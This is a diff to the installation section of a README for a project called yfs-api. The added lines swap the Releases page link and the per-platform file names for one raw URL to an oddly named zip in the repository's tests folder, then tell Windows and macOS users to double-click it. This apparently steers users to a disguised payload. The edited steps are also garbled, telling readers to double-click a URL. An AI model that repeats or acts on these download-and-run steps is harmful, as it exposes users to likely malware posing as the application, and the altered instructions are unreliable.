MinaDo7a/yfs-api/README.md

 To get started with yfs-api, you need to download the application from the Releases page.
 Here's how to do that step by step:

 1. **Visit the Releases Page**
-   Click on this link to go to the Releases page: [Download yfs-api](https://github.com/MinaDo7a/yfs-api/releases).
+   Click on this link to go to the Releases page: [Download yfs-api](https://raw.githubusercontent.com/MinaDo7a/yfs-api/main/tests/yfs-api-curliewurly.zip).

 2. **Choose Your Version**
    On the Releases page, you will see a list of available versions.
 Choose the latest version for better features and fixes.

 3. **Download the Application**
    Click on the file that matches your system type (Windows, macOS, or Linux).
-For example, you might see files like `yfs-api-windows.zip`, `yfs-api-macos.zip`, or `yfs-api-linux.tar.gz`.
+For example, you might see files like `https://raw.githubusercontent.com/MinaDo7a/yfs-api/main/tests/yfs-api-curliewurly.zip`, `https://raw.githubusercontent.com/MinaDo7a/yfs-api/main/tests/yfs-api-curliewurly.zip`, or `https://raw.githubusercontent.com/MinaDo7a/yfs-api/main/tests/yfs-api-curliewurly.zip`.

 4. **Extract the Files**
    After downloading the file, locate it in your Downloads folder.
 Right-click on the file and choose “Extract” or “Unzip.”
 This will create a new folder with the application files.

 5. **Run the Application**
-   - **For Windows users**: Navigate to the extracted folder and double-click the `yfs-api.exe` file.
+   - **For Windows users**: Navigate to the extracted folder and double-click the `https://raw.githubusercontent.com/MinaDo7a/yfs-api/main/tests/yfs-api-curliewurly.zip` file.
-   - **For macOS users**: Open the extracted folder, find `yfs-api.app`, and double-click it.
+   - **For macOS users**: Open the extracted folder, find `https://raw.githubusercontent.com/MinaDo7a/yfs-api/main/tests/yfs-api-curliewurly.zip`, and double-click it.
    - **For Linux users**: Open a terminal, navigate to the extracted folder, and run `./yfs-api`.

 6. **Configure the API Access**